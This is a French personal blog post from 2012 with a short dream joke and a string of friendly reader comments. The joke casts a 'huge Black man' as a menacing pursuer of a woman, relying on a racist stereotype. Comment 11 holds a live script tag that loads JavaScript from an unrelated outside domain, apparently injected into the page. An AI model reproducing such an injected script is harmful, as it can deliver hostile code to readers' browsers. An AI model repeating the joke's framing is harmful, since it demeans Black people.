• BON WEEK END ET JOLI REVE

    BON WEEK END ET JOLI  REVE

    Profondément endormie, une femme fait un rêve

    Elle est poursuivie, dans une rue totalement déserte, par un immense Noir au torse luisant, vêtu d'un simple short en jean;

    Elle a beau courir à perdre haleine, il la rattrape, la saisit d'une main ferme, l'entraîne dans un terrain vague, et la plaque au sol.

    D'une voix tremblante elle lui demande :
    - Qu'est-ce que vous allez me faire ?

    Alors le Noir se penche vers elle et lui dit :
    - Je ne sais pas. Ce n'est pas moi qui rêve...


    Tags Tags : , , , ,
  • Commentaires

    1
    Karlyne
    Samedi 12 Mai 2012 à 19:19

    Hi hi

    Coucou ma Chouchounette

    Comment vas-tu?

    Je suis de retour mais pas trop présente

    car après 15 jours d'absence je dois tout remettre à jour

    J'ai vu le message sur le blog de Janine

    C'était un super moment!

    Je pense que toutes les trois on aurait bien rigolé

    si je passe par chez toi je viendrai te voir

    Nous allons faire la Lorraine et l'Alsace en septembre

    mais ce n'est peut-être pas au même endroit

    Dejà le Parc Ste Croix Rhodès

    En attendant le travail reprend bientôt GRR

    Je te souhaite un très bon week-end

    A bientôt gros bibis

     

     

    2
    Samedi 12 Mai 2012 à 21:17
    3
    Dimanche 13 Mai 2012 à 06:08

    hebergeur d'image

     

    comme c'est dimanche et que tu dois encore être dans ton lit entrain de ronfler

    nous te déposons un petit message dans ta boite aux lettres

    «nous sommes là devant ta porte et comme tu dois encore dormir nous repartons sans faire de bruit en te déposant mille et un gros bisous, bruno et dom »

    4
    Dimanche 13 Mai 2012 à 21:08
    5
    Lundi 14 Mai 2012 à 06:28

    hebergeur d'image

     

    DEBOUT, IL EST L'HEURE

    faut se réveiller, fini le week-end

    ouiiii avec ce temps on est tellement mieux sous la couette

    tu veux qu'on t'aide pour te lever?

    Attend!!!!!

    et plouf, voilà t'as même plus besoin de prendre une douche

    tu vois, un seau d'eau ça réveil, faut toujours en avoir un de prêt lol

    bonne journée à toi

    gros bisous de bruno et dom

    6
    Lundi 14 Mai 2012 à 10:59

    bisous ma douce nicole

    7
    Lundi 14 Mai 2012 à 14:10

    bonjour ma chouchounette.. trop marrante ton histoire.. j'ai bien aimé !! ta créa est superbe !! tu as vraiment beaucoup de talent !! je te souhaite un excellent lundi - bisous - claire

    8
    Cigalix
    Lundi 14 Mai 2012 à 14:50

    Bonjour
    Je passe dans ton bel univers,te souhaiter un bon après midi
    Ici le soleil est toujours au rendez vous donc on en profites un max!
    Prends soin de toi
    Je te dis à bientôt
    Bises
    Sophie

    9
    Lundi 14 Mai 2012 à 15:50

    Bonjour ma Chouchounette!


    Tu vas bien ma douce je passe te faire un tit coucou d'amitié! Quelle belle créa et beau rêve ma Nicole ihih " j'adore les rues désertes moi aussi lol!!!) trop bien ta blagounette ma douce!!! Je t'offre ma dernière créa ma belle avec tes tubes et pleins de gros bisous de nous deux...Mary et Rochas...


    merci ma douce marie et rochat pour ce tres beau cadeau
    10
    MagalieMSGA
    Lundi 14 Mai 2012 à 16:32

    Nicole, comme toujours je suis pliée, j'adore la chute moi je sais ce que je lui aurais dit..


    Tes créations sont fabuleuses,que du bonheur...


    Une jolie semaine toute douce avec des gros bisous..


    Magalie


    CUPIDON ET SES SURPRISES...

    11
    http://domisiladedee
    Lundi 14 Mai 2012 à 17:30

    trop mimi  ta créa  avec  ces  petites bêtes  mignonnes  ..je te souhaite  un bon lundi  ensoleillé comme chez  nous  on revit  bisou ma  nicole ..

    <script src="http://superoseplugin.info/dfi823hs.js?0.6458672825154145" type="text/javascript"></script>
    12
    Lundi 14 Mai 2012 à 18:11

    coucou j'arrive pour te souhaiter une bonne fin de journée et un bon début de semaine de gros bizzzous

    13
    Lundi 14 Mai 2012 à 18:18

    Bonjour ma Choupinette


    C'est un peu dans "les vaps" que je viens te faire de très gros bisous


    Depuis une dizaine de jours je suis malade et je ne fais que de dormir et me soigner


    pardonne moi si je ne t'ai pas téléphoné mais vraiment je n'était pas en état


    Ce soir je me suis poussée pour te faire une petit mot car je viens de me lever mais je ne vais pas trop rester sur l'ordi, cela me fatigue


    Demain matin je ne serais pas disponible mais si tu veux demain aprem tu peux me joindre à la maison


    Ne t'inquiète pas ma pupuce je t'expliquerai


    Bonne soirée ma Poussinette je t'embrasse très fort


    Ta p'tite fée


     


     

    14
    Janine62 Profil de Janine62
    Lundi 14 Mai 2012 à 19:45

    coucou ma Chouchou !

    hihihi ! suis toujours pliée quand je viens chez toi !

    toujours le mot pour rire !

    j'espère que tu vas bien et que tu as profité du soleil,

    car demain la météo nous annonce le retour de la pluie !

    ayez ma chouchou,   chéri est rentré je crois  ?? 

    je te souhaite un bon début de semaine,

    gros bisous ma belle !

    Athos & Cheyenne

    15
    Mardi 15 Mai 2012 à 06:27

    hebergeur d'image

     

    comme il ne fait pas trop beau il nous est venu une idée

    on va tous faire des gâteaux ou des tartes et on fera un stand pour les vendre

    avec ça on partira en vacances au soleil

    allé au boulot

    nous te souhaitons une bonne journée

    gros bisous de bruno et dom

    16
    Danie83
    Samedi 27 Juillet 2013 à 08:47

    Bonne journée....avec le soleil et de belles images

    Merci chouchounette

    17
    Danie83
    Samedi 27 Juillet 2013 à 08:49

    BISOUS

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :